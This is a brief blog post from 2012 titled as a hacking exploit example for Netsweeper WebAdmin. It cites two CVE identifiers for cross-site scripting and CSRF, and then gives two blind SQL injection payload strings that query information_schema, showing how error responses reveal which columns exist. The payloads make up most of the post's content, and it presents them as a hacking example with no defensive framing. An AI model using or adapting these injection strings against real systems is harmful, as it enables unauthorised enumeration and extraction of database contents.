Wednesday, July 11, 2012

Hacking Netsweeper WebAdmin Exploit Example

Exploitation Example 1/2: CVE-2012-2446 for the XSS issues, CVE-2012-2447 for the CSRF





Exploitation Example 2/2: SQLi ("The later")

-->Error: does not exist 
and (select case when(select substring(report,1,1) from information_schema.schemata limit 0,1) then null else null end)&type=demand&id=1441 


No Error: does exist
and (select case when(select substring(report_date,1,1) from information_schema.schemata limit 0,1) then null else null end)&type=demand&id=1441


No comments:

Post a Comment